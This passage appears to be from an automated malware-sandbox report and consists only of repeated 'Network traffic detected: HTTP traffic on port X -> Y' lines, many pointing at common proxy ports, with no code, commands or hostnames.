                    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 8899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6764 -> 49848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 60186
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 58394
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 3820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 11673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 59058
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 25508
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 543
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 20481
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 8083
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 31602
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 6005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 64693
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 11946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 9229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 8082
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 7302
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 51778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49815
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 30464
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 15673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 33829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 62842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 31602 -> 50095
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 82
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 10958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 6745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 60186
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50134
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 8989
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 65201
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50164
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 11673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50160
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 8123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50333 -> 20481
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 25508
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 3129
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50341 -> 30000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50347 -> 39796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 12259
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 10471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50364 -> 6005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 8181
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50371 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 55606
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 15673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 6788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50401 -> 6438
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 32770 -> 49847
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8082 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 26589
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 8123
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50164
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 26939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50325
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6745 -> 50286
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50455 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 46859
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8989 -> 50211
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 9229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 51778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 8081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 37379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49929
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 50430
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50512 -> 15673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 58394
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 19050
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 5784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 50236
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50513 -> 20481
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 60186
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 32284
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 8899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 25508
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6788 -> 50409
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50500
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 62842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 82
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 6005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50475 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50336 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 49314
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50535 -> 26589
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 18072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 55606
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 30001
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 10820
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 51350
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 35010
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 15673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 15460
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 56755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50541 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 32284
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50542 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50261 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 32148
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 9229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 20481
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50328 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50500
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50515 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 26589
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 2419
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50202
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50550 -> 6005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50538 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50520 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 11176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 10471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 6984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50561 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50411 -> 35860
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50240
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50548 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50547 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50077
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50450 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50336
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 32284
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 60186
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50561 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 6984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 62842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 82
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 55606
                    Source: unknownNetwork traffic detected: HTTP traffic on port 543 -> 49964
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 58394
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 6984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 9229
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 32284
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50574 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50469 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50583 -> 34090
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 39873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50585 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 60870
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50496 -> 50578
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 26589
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50499 -> 10919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50526 -> 37901
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50517 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50220 -> 48359
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 3663
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 3312
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50544 -> 15311
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50557 -> 64608
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 62691
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 42823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 999
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 9090
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50563 -> 35010
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 35087
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 9603
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 56862
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 51025
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 53672
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50371
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 56238
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 53281
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 36477
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50593 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 36946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 64305
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 8100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50594 -> 9000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50332 -> 59810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50598 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 10471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50605 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50599 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 10919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50613 -> 15311
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50611 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 12259
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 6984
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50615 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50636 -> 9898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 8089
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 46859
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50309 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50638 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50641 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 14287
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50043
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50434 -> 26789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 543
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50623 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50667 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50670 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50671 -> 10919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50673 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50457 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50682 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 37379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 15311
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 5784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50690 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 56225
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50485 -> 8085
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50696 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50704 -> 9733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50711 -> 42042
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50720 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50592 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 64556
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50781 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 25295
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50817 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 18072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 49314
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50838 -> 44499
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 62842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50723 -> 8888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50709 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50623
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50842 -> 10919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50725 -> 8888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50865 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 15311
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50882 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50183
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 15460
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50776 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 17179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50261 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 28134
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 8585
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50906 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50934 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 32148
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 56225
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50965 -> 32520
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50879 -> 9091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50737 -> 8899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50595 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 543
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50704 -> 9733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 2419
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 82
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50919 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51009 -> 34409
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8585 -> 50932
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51015 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51012 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51040 -> 53397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51054 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51122 -> 38721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 27829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 25295
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50711 -> 42042
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 64556
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 5000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51211 -> 5432
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51220 -> 53935
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 63135
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51123 -> 33466
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50961 -> 42369
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51208 -> 46286
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51138 -> 6467
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51151 -> 6161
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51261 -> 38338
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51265 -> 8380
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51175 -> 45620
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51275 -> 46097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51296 -> 32100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51202 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50689 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 17970
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 11176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50817 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51212 -> 3129
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51231 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51250 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51253 -> 1772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 9002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51211
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51266 -> 35557
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50633 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51098 -> 8037
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51321 -> 8881
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51314 -> 38242
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51156 -> 1081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51333 -> 2335
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 8888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51144 -> 20074
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51343 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51436 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50879
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51194 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51062 -> 7302
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51458 -> 15427
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51390 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51195 -> 5000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51393 -> 3000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51295 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51269 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51433 -> 1647
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8881 -> 51321
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51252 -> 9091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51508 -> 9367
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50934 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51486 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51559 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50683 -> 13988
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51491 -> 40927
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51590 -> 15393
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51316 -> 26154
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51552 -> 15685
